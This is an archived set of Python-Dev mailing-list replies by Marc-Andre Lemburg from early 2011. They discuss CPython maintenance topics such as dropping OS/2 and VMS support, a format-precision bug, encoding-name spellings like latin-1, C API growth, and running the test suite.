 There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait
 until someone work on these OSes to ensure that the test suite pass. But
 if nobody cares of these OSes and nobody wants to maintain them, it
 would be easier for the maintenance of the Python source code base to
 remove specific code.

 Well, not remove directly, but plan to remove it using the PEP 11
 procedure (mark OS/2 and VMS as unsupported, and remove the code in
 Python 3.4).

 The Python core team is not really representative of the Python
 community users, so I think this needs a different approach:

 Instead of simply deprecating OSes without notice to the general
 Python community, how about doing a call for support for these
 OSes ?

 If that doesn't turn up maintainers, then we can take the PEP 11
 route.
 
 Victor, if you want to post the call for support to Python Insider, let me 
 know off list and I will set you up with access.

I can help with that if you like.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 19 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Replace useless %.100s by %s in PyErr_Format()

2011-03-30 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le jeudi 24 mars 2011 à 13:22 +0100, M.-A. Lemburg a écrit :
 BTW: Why do you think that %.100s is not supported in
 PyErr_Format() in Python 2.x ? PyString_FromFormatV()
 does support this. The change to use Unicode error strings
 introduced the problem, since PyUnicode_FromFormatV() for
 some reason ignores the precision (which is shouldn't).
 
 Oh... You are right, it is a regression in Python 3. We started to write
 unit tests for PyBytes_FromFormat() and PyUnicode_FromFormat(), I hope
 that they will improve the situation.
 
 That said, it's a good idea to add the #7330 fix
 to at least Python 2.7 as well, since ignoring the precision
 is definitely a bug. It may even be security relevant, since
 it could be used for DOS attacks on servers (e.g. causing them
 to write huge strings to log files instead of just a few
 hundreds bytes per message), so may even need to go into Python 2.6.
 
 Python 2 is not affected because PyErr_Format() uses
 PyString_FromFormatV() which supports precision for %s format (e.g.
 %.100s truncate the string to 100 bytes).

Right, but the PyUnicode_FromFormatV() which ignores
the precision is still present in Python 2.6 and 2.7,
even though it is not used by PyErr_Format().

 Do you think that Python 3.1-3.3 should be fixed?

Yes, indeed. The above mentioned security threat is real.

The CPython code only has a few cases where this could be use
for a DOS (e.g. in the pickle module or the AST code), but
since this function is used in 3rd party extensions,
those are affected indirectly as well.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Mar 30 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Copyright notices

2011-03-21 Thread M.-A. Lemburg
Nadeem Vawda wrote:
 I was wondering what the policy is regarding copyright notices and license
 boilerplate text at the top of source files.
 
 I am currently rewriting the bz2 module (see 
 http://bugs.python.org/issue5863),
 splitting the existing Modules/bz2module.c into Modules/_bz2module.c and
 Lib/bz2.py.
 
 Are new files expected to include a copyright notice and/or license 
 boilerplate
 text? 

Since you'll be adding new IP to Python, the new code you write should
contain your copyright and the standard PSF contributor agreement
notice, e.g.


(c) Copyright 2011 by Nadeem Vawda. Licensed to PSF under a Contributor 
Agreement.


(please also make sure you have sent the signed agreement to the PSF;
see http://www.python.org/psf/contrib/)

We don't have a general copyright or license boiler plate for Python
source files.

 Also, is it necessary for _bz2module.c (new) to retain the copyright
 notices from bz2module.c (old)? In the tracker issue, Antoine said he didn't
 think so, but suggested that I get some additional opinions.

If the file copies significant code parts from older files, the
copyright notices from those files will have to added to the
file comment as well - ideally with a note explaining to which parts
those copyrights apply and where they originated.

If you are replacing the old implementation with a new one,
you don't need to copy over the old copyright statements.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Mar 21 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Improvements for Porting C Extension from 2 to 3

2011-03-03 Thread M.-A. Lemburg
Sümer Cip wrote:
 Hi,
 
 While porting a C extension from 2 to 3, I realized that there are some
 general cases which can be automated. For example, for my specific
 application (yappi - http://code.google.com/p/yappi/), all I need to do is
 following things:
 
 1) define PyModuleDef
 2) change PyString_AS_STRING calls  to _PyUnicode_AsString

Aside: Please don't use private APIs in Python extensions. Esp.
the above Unicode API is likely going to be phased out.

You're better off, using PyUnicode_AsUTF8String() instead and
then leaving the PyString_AS_STRING() macro in place.

 3) change module init code a little.
 
 It occurred to me all these kind of standart changes can be automated via a
 script.
 
 Not sure on the usability of this however, because of my limited knowledge
 on the area.
 
 Does such a tool worth being implemented?

I'm not sure whether you can really automate this: The change from
8-bit strings to Unicode support usually requires reconsidering
whether you're dealing with plain text, encoded text data or
binary data.

However, a guide of what to replace and how to change the code
would probably help a lot. Please share your thoughts on the
python-porting mailint list and/or add to these wiki pages:

http://wiki.python.org/moin/PortingToPy3k
http://wiki.python.org/moin/PortingExtensionModulesToPy3k

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Mar 03 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-24 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 6:32 PM, M.-A. Lemburg m...@egenix.com wrote:
 Alexander Belopolsky wrote:
 ..
 In what sense is Latin-1 the official name?  The IANA charset
 registry has the following listing


 Name: ISO_8859-1:1987[RFC1345,KXS2]
 MIBenum: 4
 Source: ECMA registry
 Alias: iso-ir-100
 Alias: ISO_8859-1
 Alias: ISO-8859-1 (preferred MIME name)
 Alias: latin1
 ..
 Latin-1 is short for Latin Alphabet No. 1 and
 started out as ECMA-94 in 1985 and 1986:
 
 This does not explain your preference of Latin-1 over Latin1.

This is not my preference. See e.g. Wikipedia
http://en.wikipedia.org/wiki/ISO/IEC_8859-1

It is common practice to replace spaces in descriptive names with
a hyphen to come up with an identifier string (even Google
does or undoes this when searching the net).

Replacing spaces with an empty string is also an option, but
doesn't read as well.

 Both are perfectly valid abbreviations for Latin Alphabet No. 1.
 The spelling without - has the advantage of being a valid Python
 identifier and a module name.

The hyphens are converted to underscores by the lookup function
in the encodings package. That turns the name into a valid
Python module name.

  The IANA registration for latin1 and
 lack of that for latin-1 most likely indicates that the former is
 more commonly found in machine readable metadata.

I don't know why you emphasize so much on machine readable metadata.
Python source code is machine readable, the Internet is machine
readable, all documents found there are machine readable.

As I said earlier on: the IANA registry is just that - a registry
of names with the purpose of avoiding name clashes in the resp.
name space. As such, it is not a standard, but merely a tool
to map various aliases to a canoncial name.

The fact that an alias is registered doesn't allow any
implication on whether it's in wide-spread use or not, e.g.
csISOLatin1 gives me 6810 hits on Google.

I get 788,000 hits for 'latin1 -latin-1' on Google,
'latin-1' gives 2,600,000 hits. Looks like it's still
the preferred way to write that encoding name.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 24 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:07 PM, Guido van Rossum gu...@python.org wrote:
 I'm guessing that one of these encoding names is recognized by the C
 code while the other one takes the slow path via the aliasing code.
 
 This is absolutely right.  In fact I am going to propose adding
 strcmp(lower, latin1) to the following test in
 PyUnicode_AsEncodedString():
 
 
   else if ((strcmp(lower, latin-1) == 0) ||
  (strcmp(lower, iso-8859-1) == 0))
 return PyUnicode_EncodeLatin1(...
 
 I'll open a separate issue for that.  In Python's own stdlib and tests
 latin1 is a more common spelling than latin-1, so it makes sense
 to optimize it.

Latin-1 is the official name and the one used internally by Python,
so it would be good to have the test suite and Python code in general
to use that variant of the name (just as utf-8 is preferred over
utf8).

Instead of adding more aliases to the C code, please change the
encoding names in the stdlib and test suite.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 23 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Latin-1 is the official name and the one used internally by Python,
 so it would be good to have the test suite and Python code in general
 to use that variant of the name (just as utf-8 is preferred over
 utf8).

 Instead of adding more aliases to the C code, please change the
 encoding names in the stdlib and test suite.
 
 I cannot agree with you on this one.  Official or not, latin-1 is
 much less commonly used than latin1.   Currently decode(latin1) is
 10x slower than  decode(latin-1) on short strings.  We already have
 a check for iso-8859-1 alias in PyUnicode_AsEncodedString().  Adding
 latin1 (and possibly utf8 as well) is likely to speed up many
 applications at minimal cost.

Fair enough, then add latin1 and utf8 to both PyUnicode_Decode()
and PyUnicode_AsEncodedString().

Still, the stdlib and test suite should be examples of using the
correct names.

I only found these few cases where the wrong Latin-1 name is used
in the stdlib:

./distutils/command/bdist_wininst.py:
-- # convert back to bytes. latin1 simply avoids any possible
-- encoding=latin1) as script:
-- script_data = script.read().encode(latin1)
./urllib/request.py:
-- data = base64.decodebytes(data.encode('ascii')).decode('latin1')
./asynchat.py:
-- encoding= 'latin1'
./ftplib.py:
-- encoding = latin1
./sre_parse.py:
-- encode = lambda x: x.encode('latin1')

I get 12 hits for the test suite.

Yet 108 for the correct name, so I can't follow your statement
that the wrong variant is used more often.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 23 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:54 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Yet 108 for the correct name, so I can't follow your statement
 that the wrong variant is used more often.
 
 Hmm, your grepping skills are probably better than mine. I get
 
 
 $ grep -iw latin-1 Lib/*.py | wc -l
   24
 
 and
 
 $ grep -iw latin1 Lib/test/*.py | wc -l
   25
 
 (I did get spurious hits with naive grep latin1, so I retract my
 more often claim and just say that both spellings are equally
 common.)

I used a Python script based on re, perhaps that's why :-)

grep only counts lines, not multiple instances on a single line
and looking through the hits I found, there are a few false
positives such as 'latin-10' or 'iso-latin-1'. Without those,
I get 83 hits.

If you open a ticket for this, I'll add the list of hits to
that ticket.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 23 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Latin-1 is the official name and the one used internally by Python,
 
 In what sense is Latin-1 the official name?  The IANA charset
 registry has the following listing
 
 
 Name: ISO_8859-1:1987[RFC1345,KXS2]
 MIBenum: 4
 Source: ECMA registry
 Alias: iso-ir-100
 Alias: ISO_8859-1
 Alias: ISO-8859-1 (preferred MIME name)
 Alias: latin1
 Alias: l1
 Alias: IBM819
 Alias: CP819
 Alias: csISOLatin1
 
 (See http://www.iana.org/assignments/character-sets)

Those are registered character set names, not necessarily
standard names. Anyone can apply for new aliases to get
added to that list.

 Latin-1 spelling does appear in various unicode.org documents, but
 not in machine readable files as far as I can tell.

Latin-1 is short for Latin Alphabet No. 1 and
started out as ECMA-94 in 1985 and 1986:

http://www.ecma-international.org/publications/standards/Ecma-094.htm

ISO then applied their numbering scheme for the character set
standard ISO-8859 in 1987 where Latin-1 became ISO-8859-1.
Note that this was before the Internet took off.

I assume that since the HTML standard used the more popular
name Latin-1 for its definition of the default character set
and also made use of the term throughout the spec, it
became the de-facto standard name for that character set
at the time. I only learned about the term ISO-8859-1
when starting to dive into the Unicode world late in the
1990s.

Latin-1 is also sometimes written as ISO Latin-1, e.g.
http://msdn.microsoft.com/en-us/library/ms537495(v=vs.85).aspx

For much the same reasons, ISO-10646 never really became
popular, but Unicode eventually did.

ECMA-262 or ISO/IEC 16262 just doesn't sound as good as
JavaScript either :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 23 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] API bloat

2011-02-10 Thread M.-A. Lemburg
Mark Shannon wrote:
 Nick Coghlan wrote:
 On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk
 wrote:
 Doing a search for the regex:  PyAPI_FUNC\([^)]*\) *Py in .h files,
 which should match API functions (functions starting _Py are
 excluded) gives
 the following result:

 Version  matches
 3.0   717
 3.1.3 728
 3.2b2 743

 It would appear the API  bloat is real,
 not just an artefact of updated docs.

 Since it doesn't account for #ifdef, a naive count like that isn't a
 valid basis for comparison.

 OK. How about this:
 
 egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h
 finds no matches.
 
 egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u
 
 This finds all matches and removes duplicates, so anything defined
 multiple time in branches of #ifdef blocks, will only be counted once.
 
 Version  matches
 3.0   714
 3.1.3 725
 3.2b2 739

Given these numbers, I don't think the subject line really
captures the problem accurately enough ... a 2% increase
in number of API function per release can hardly be called
API bloat :-)

 So given, the revised numbers;
 
 The what's new for 3.2 API section:
 http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes
 lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2.

Could you identify the ones that are not yet documented ?

That would be useful.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 10 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] API bloat

2011-02-10 Thread M.-A. Lemburg
Mark Shannon wrote:
 M.-A. Lemburg wrote:
 Mark Shannon wrote:
 Nick Coghlan wrote:
 On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk
 wrote:
 Doing a search for the regex:  PyAPI_FUNC\([^)]*\) *Py in .h files,
 which should match API functions (functions starting _Py are
 excluded) gives
 the following result:

 Version  matches
 3.0   717
 3.1.3 728
 3.2b2 743

 It would appear the API  bloat is real,
 not just an artefact of updated docs.
 Since it doesn't account for #ifdef, a naive count like that isn't a
 valid basis for comparison.

 OK. How about this:

 egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h
 finds no matches.

 egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u

 This finds all matches and removes duplicates, so anything defined
 multiple time in branches of #ifdef blocks, will only be counted once.

 Version  matches
 3.0   714
 3.1.3 725
 3.2b2 739

 Given these numbers, I don't think the subject line really
 captures the problem accurately enough ... a 2% increase
 in number of API function per release can hardly be called
 API bloat :-)

 So given, the revised numbers;

 The what's new for 3.2 API section:
 http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes

 lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2.

 Could you identify the ones that are not yet documented ?

 That would be useful.
 
 Here's the details:
 
 The following API functions were removed from 3.1.3:
 
 PyAST_Compile
 PyCObject_AsVoidPtr
 PyCObject_FromVoidPtr
 PyCObject_FromVoidPtrAndDesc
 PyCObject_GetDesc
 PyCObject_Import
 PyCObject_SetVoidPtr
 PyCode_CheckLineNumber
 Py_CompileStringFlags
 PyEval_CallObject
 PyOS_ascii_atof
 PyOS_ascii_formatd
 PyOS_ascii_strtod
 PyThread_exit_prog
 PyThread__PyThread_exit_prog
 PyThread__PyThread_exit_thread
 PyUnicode_SetDefaultEncoding
 
 And the following were added to 3.2,
 of which only 2 are documented:
 
 PyArg_ValidateKeywordArguments
 PyAST_CompileEx
 Py_CompileString
 Py_CompileStringExFlags
 PyErr_NewExceptionWithDoc(documented)
 PyErr_SyntaxLocationEx
 PyErr_WarnFormat
 PyFrame_GetLineNumber
 PyImport_ExecCodeModuleWithPathnames
 PyImport_GetMagicTag
 PyLong_AsLongLongAndOverflow(documented)
 PyModule_GetFilenameObject
 Py_SetPath
 PyStructSequence_GetItem
 PyStructSequence_NewType
 PyStructSequence_SetItem
 PySys_AddWarnOptionUnicode
 PySys_AddXOption
 PySys_FormatStderr
 PySys_FormatStdout
 PySys_GetXOptions
 PyThread_acquire_lock_timed
 PyType_FromSpec
 PyUnicode_AsUnicodeCopy
 PyUnicode_AsWideCharString
 PyUnicode_EncodeFSDefault
 PyUnicode_FSDecoder
 Py_UNICODE_strcat
 Py_UNICODE_strncmp
 Py_UNICODE_strrchr
 PyUnicode_TransformDecimalToASCII
 
 For added confusion PySys_SetArgvEx is documented as
 new in 3.2, but exists in 3.1.3
 
 That should keep someone busy ;)
 
 Note that this only include functions.
 The API also includes a number of macros such as
 Py_False and Py_RETURN_FALSE, types ,
 and data like PyBool_Type.
 
 I've not tried to analyse any of these.

Thanks.

I opened http://bugs.python.org/issue11173 for this.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 10 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] API bloat

2011-02-09 Thread M.-A. Lemburg
Mark Shannon wrote:
 The Unicode Exception Objects section is new and seemingly redundant:
 http://docs.python.org/py3k/c-api/exceptions.html#unicode-exception-objects
 Should this be in the public API?

Those function have been in the public API since we introduced
Unicode callbak error handlers.

It was an oversight that these were not documented in the Python
documentation. They have been documented part of the unicodeobject.h
ever since they were introduced.

Note that these APIs are needed by codecs supporting the
callback error handlers, and since performance matters a lot
for codecs, the C APIs were introduced.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 09 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python Unit Tests

2011-02-08 Thread M.-A. Lemburg
Wesley Mesquita wrote:
 Hi all,
 
 I starting to explore python 3k core development environment. So, sorry in
 advance for any mistakes, but I really don't know what is the best list to
 post this, since it not a use of python issue, and probably is not a dev
 issue, it is more like a dev env question.
 
 I have ran the test suit, and got the messages below.
 
 ~/python_dev/python$ make testall
 
 ./python -Wd -E -bb  ./Lib/test/regrtest.py -uall -l
 == CPython 3.2rc2+ (py3k:88376, Feb 7 2011, 18:31:28) [GCC 4.4.5]
 ==   Linux-2.6.35-24-generic-x86_64-with-debian-squeeze-sid little-endian
 ==   /home/wesley/python_dev/python/build/test_python_3387
 Testing with flags: sys.flags(debug=0, division_warning=0, inspect=0,
 interactive=0, optimize=0, dont_write_bytecode=0, no_user_site=0, no_site=0,
 ignore_environment=1, verbose=0, bytes_warning=2, quiet=0)
 
 [...]
 
 [198/349] test_ossaudiodev
 test_ossaudiodev skipped -- [Errno 2] No such file or directory: '/dev/dsp'
 
 [...]
 
 [200/349] test_parser
 Expecting 's_push: parser stack overflow' in next line
 s_push: parser stack overflow
 
 [...]
 
 [321/349] test_urllib2net
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=8, family=2, type=2049, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning:
 unclosed socket.socket object, fd=7, family=2, type=2049, proto=6
   sys.exc_info()[2])
 /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning:
 unclosed socket.socket object, fd=8, family=2, type=2049, proto=6
   sys.exc_info()[2])
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=8, family=2, type=1, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=9, family=2, type=1, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=9, family=2, type=2049, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=7, family=2, type=2049, proto=6
   self._sock = None
 [323/349] test_urllibnet
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=7, family=2, type=1, proto=6
   self._sock = None
 
 
 24 tests skipped:
 test_bz2 test_curses test_dbm_gnu test_dbm_ndbm test_gdb
 test_kqueue test_ossaudiodev test_readline test_smtpnet
 test_socketserver test_sqlite test_ssl test_startfile test_tcl
 test_timeout test_tk test_ttk_guionly test_ttk_textonly
 test_urllib2net test_urllibnet test_winreg test_winsound
 test_xmlrpc_net test_zipfile64
 9 skips unexpected on linux2:
 test_bz2 test_dbm_gnu test_dbm_ndbm test_readline test_ssl
 test_tcl test_tk test_ttk_guionly test_ttk_textonly
 sys:1: ResourceWarning: unclosed file _io.TextIOWrapper name='/dev/null'
 mode='a' encoding='UTF-8'
 
 
 But running each of them individually:
 
 :~/python_dev/python$ ./python Lib/test/regrtest.py  test_ossaudiodev
 [1/1] test_ossaudiodev
 test_ossaudiodev skipped -- Use of the `audio' resource not enabled
 1 test skipped:
 test_ossaudiodev
 Those skips are all expected on linux2.
 
 ./python Lib/test/regrtest.py test_parser
 [1/1] test_parser
 Expecting 's_push: parser stack overflow' in next line
 s_push: parser stack overflow
 1 test OK.
 
 ./python Lib/test/regrtest.py test_urllib2net[1/1] test_urllib2net
 test_urllib2net skipped -- Use of the `network' resource not enabled
 1 test skipped:
 test_urllib2net
 Those skips are all expected on linux2.
 
 Is there any reason for the different results?

Yes: you are not using the same options on the stand-alone
tests as you are on the suite run. Most importantly, you
are not enabling all resources (-uall).

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 08 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP 393: Flexible String Representation

2011-01-25 Thread M.-A. Lemburg
I'll comment more on this later this week...

From my first impression, I'm
not too thrilled by the prospect of making the Unicode implementation
more complicated by having three different representations on each
object.

I also don't see how this could save a lot of memory. As an example
